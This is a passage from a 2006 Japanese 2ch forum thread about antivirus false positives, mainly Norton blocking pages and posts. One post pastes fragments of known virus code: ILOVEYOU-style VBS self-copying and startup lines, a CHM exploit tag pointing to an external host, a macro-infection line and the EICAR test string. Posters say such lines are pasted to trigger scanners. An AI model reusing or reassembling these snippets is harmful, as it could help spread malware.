612 名前：ひよこ名無しさん [2006/07/01(土) 00:07:11 ID:Dt6nkhA2]: game10.2ch.net/test/read.cgi/arc/1151603946/16

コレって書き込んだ本人がウイルスに感染しているって事でしょうか？
613 名前：ひよこ名無しさん mailto:sage [2006/07/01(土) 00:08:55 ID:???]: >>612
ノートン先生を誤反応させるためにわざと貼ってるんだよ
614 名前：612 [2006/07/01(土) 00:39:41 ID:Dt6nkhA2]: ただ、これ書いた人がカードゲームのトレードスレに
自分のメルアド出してブログバレしてます
615 名前：ひよこ名無しさん mailto:sage [2006/07/01(土) 23:18:07 ID:???]: 複雑な自爆では？
616 名前：ひよこ名無しさん [2006/07/02(日) 19:36:03 ID:ytfN9V0/]: ノートン２００６でAutoprotectの設定で、ログのフォルダを除外したいのですが、
それらしい項目が分かりません。
Norton　AntiVirusオプションの項目ではないのでしょうか？
617 名前：ひよこ名無しさん [2006/07/02(日) 20:00:00 ID:ytfN9V0/]: 事故解決しました。
618 名前：ひよこ名無しさん [2006/07/03(月) 19:55:32 ID:pfnK+d5L]: 専ブラ（Jane）での書き込みの妨害も先生の仕業？
更新かけて解決するのであれば（期限切れ）、
してやらんでもないのだが・・・。
619 名前：ひよこ名無しさん mailto:sage [2006/07/03(月) 22:30:42 ID:???]: >>618
> 更新かけて解決するのであれば（期限切れ）、

それはないな。FW（が入っているのであれば）一時的に切ってみるしか
620 名前：618 [2006/07/03(月) 23:15:21 ID:pfnK+d5L]: >>619
いや、プラウザからなら書き込めるんですよ。
ノートン有効→一部の板の閲覧不可（IE、専ブラ共に）
　　　　無効→共に閲覧は可能　専ブラでの書き込みが不可。
ってわけでこの板だけは、IEからしか書き込めないんです・・・。
まぁ、通信を許可すれば解決なんでしょうが・・・。
いろいろやってみます。　どもでした。
621 名前：ひよこ名無しさん mailto:sage [2006/07/04(火) 02:40:17 ID:???]: まったくの初心者ですが
ノートンインターネットセキュリティー2006での誤反応対策を教えてください
既出でしたらアンカーでもいいのでお願いします
622 名前：ひよこ名無しさん mailto:sage [2006/07/04(火) 08:28:52 ID:???]: >>621
>>1->>620を読め
623 名前：ひよこ名無しさん mailto:sage [2006/07/04(火) 10:11:31 ID:???]: 「まったくの初心者」

だからどうした？このスレを100回読んで知識増やせ。
624 名前：ひよこ名無しさん [2006/07/04(火) 20:16:10 ID:Bwi55Fwo]: スレを開いたら突然ウィルスに感染したんですがurlを直接踏まなくても
感染するウィルスはあるんですか？
625 名前：ひよこ名無しさん mailto:sage [2006/07/05(水) 11:14:56 ID:???]: >>624
>>1->>620を読め
626 名前：ひよこ名無しさん [2006/07/05(水) 17:10:28 ID:xPsQC9iJ]: 　　　　　　 , ---　､_
　　　　／ミミミヾヾヽ､＿
　　　∠ヾヾヾヾヾヾjj┴彡ﾆヽ
　　/ ,　-ー‐'"´´´　　　ヾ.三ヽ
　 ,' /　　　　　　　　　　　　ヾ三ヽ
　 j |　　　　　　　　　　 / }ミ　i
　 | |　　　　　　　　　　 / /ミ　 !
　 } | r､　　　　　　　　　　l　ﾞiミ __」　
　　|]ﾑヽ､_　　　　__∠二､__,ｨ|/ ｨ }
　　| 　￣｀ﾐｌ==r'´　　　 /　|lぅ　lj　　私が原田ウィルス作者ですが何か？
　　「!ヽ､_×___j　ヽ､×　 -'　　ﾚ'r'/　　
　　 `! 　　 j　　ヽ　　　　 j_ノ　　　
　　　',　　ヽｧ_ '┘　　　　　,i　　　　
　　　ヽ　　___'...＿_　　 i 　ハ__ 　　　　　
　　　　ヽ　ﾞ二二　`　 ,' ／／八
　　　　　ヽ　　　　／'´ 　 /　ヽ
　　　　　　|ヽ､＿_,　'´ / 　／　　　＼
627 名前：ひよこ名無しさん mailto:sage [2006/07/07(金) 03:17:23 ID:???]: >>577
遅ﾚｽだけど一応。
ttp://mickey.mirv.net/2chnis.html
↑みて最新のｱﾄﾞﾚｽ設定しる
628 名前：ひよこ名無しさん [2006/07/15(土) 01:31:41 ID:668g3rrq]: こんなPCはネットにつなぐな！ 3日間放置した無防備PCの結末は？
arena.nikkeibp.co.jp/col/20050510/112145/

以下すべて日本語対応で無料。

ブラウザ：Firefox www.mozilla-japan.org/products/firefox/
メーラー：Thunderbird www.mozilla-japan.org/products/thunderbird/
　上記2種の拡張（beau.g-com.ne.jp/mon-extension.html）
スパイウェア対策：www.geocities.jp/primarystage/spyware.html
ウィルス対策：avast! www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html
適当なルーター：BUFFALO BBR-4HG　netspeed.studio-radish.com/netspeeddata/throughput_review/buffalo_bbr4hg.html

無料のウイルス対策ソフトなどのセキュリティソフト一覧
www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html
セキュリティ板
pc8.2ch.net/sec/
629 名前：ひよこ名無しさん [2006/07/23(日) 19:35:23 ID:XNQAeCHC]: <body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))　　
630 名前：ひよこ名無しさん mailto:sage [2006/07/24(月) 00:49:37 ID:???]: できれば既出のものじゃなくて
新しいの一行づつ張ってほしいなぁ。
631 名前：ひよこ名無しさん mailto:sage [2006/07/29(土) 23:32:33 ID:???]: 2ＣＨ自体、５月からはじめました。
ノートンがなんだかよくわかりませんが、ある掲示板で症状を書き込んだところ
ノートン先生かといわれました。

症状としては、かんじなどを変換すると候補がでますが、するとその時点でＩＥが
強制終了してしまいます。
2ＣＨはＩＥでみています。最初から。
これ、直るのでしょうか？

パソコン使えないとネットで就職活動もできず困っています。
どうかよろしくお願いします。
632 名前：ひよこ名無しさん mailto:sage [2006/07/29(土) 23:59:23 ID:???]: このスレとは関係ないような・・・
633 名前：ひよこ名無しさん mailto:sage [2006/07/30(日) 00:06:37 ID:???]: >>631
ですけど、感染したときにLOVE-LETTERなんとかというものが画面に表示されました。
そのときなんだかわからなかったので、続行のボタンを押しました。
漢字を変換するとＩＥが落ちてしまうので、最初に出てきた感じで該当するものが泣ければ
そのままにしています。
なんとかならないでしょうか。
634 名前：ひよこ名無しさん mailto:sage [2006/07/30(日) 00:40:34 ID:???]: ここはウイルス対策ソフトの「誤反応」のスレです。
ウイルスにほんとに感染してる件ならスレ違い
635 名前：ひよこ名無しさん mailto:sage [2006/07/30(日) 03:56:39 ID:???]: >>633
よく分からないならクリーンインストールしろ。
それも出来ないなら就職浪人決定。
636 名前：ひよこ名無しさん mailto:sage [2006/07/30(日) 19:55:34 ID:???]: クリーンインストールってなに？
637 名前：ひよこ名無しさん mailto:sage [2006/07/30(日) 20:12:01 ID:???]: おまえの頭を入れ替えること
638 名前：ひよこ名無しさん mailto:sage [2006/07/31(月) 00:58:59 ID:???]: つまらん。０点。>>637
639 名前：ひよこ名無しさん mailto:sage [2006/07/31(月) 01:59:16 ID:???]: 女王様の椅子取りゲーム
640 名前：ひよこ名無しさん [2006/08/03(木) 17:37:02 ID:oF+rx1Q5]: >>636
ぐぐっておいてやった。参考にしる。

ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%82%A4%E3%83%BC%E3%83%B3%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB&lr=
ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%A4%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB&lr=
ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%A2%E3%83%B3%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB&lr=
ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%82%A5%E3%83%BC%E3%83%AB&lr=

ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%A0%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB&lr=

どれも似たような内容なので、好きなのを選べばいいべさ
641 名前：ひよこ名無しさん mailto:sage [2006/08/10(木) 13:48:08 ID:???]: ウイルスコードの誤反応ではありませんが、
ノートンを切らないとＰＣＱＡ板に入れなくなってしまいました。（進入検知が誤反応）
この場合はどうすればいいでしょうか？

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef